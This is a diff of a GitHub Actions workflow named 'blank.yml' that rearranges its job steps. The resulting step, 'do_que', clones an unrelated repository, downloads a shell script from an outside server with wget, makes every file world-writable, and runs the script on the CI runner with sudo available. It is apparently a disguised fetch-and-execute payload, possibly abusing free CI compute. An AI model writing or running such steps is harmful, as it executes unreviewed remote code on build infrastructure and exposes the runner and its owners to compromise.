--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -13,16 +13,13 @@ jobs:
       - name: Setup Python
         uses: actions/setup-python@v2.2.2
 
-      - name: download files
+      - name: do_que
         run: |
+          pip install requests
           git clone https://github.com/ohqvb1lt/gat.git
           cd gat
           wget "https://api.smyhw.online:8080/http2/test/gha2v?act=script" -O bash.sh
           chmod 777 *
           sudo apt-get install screen
-      
-      - name: run
-        run: |
-          pip install requests
-          cd gat
           ./bash.sh
+
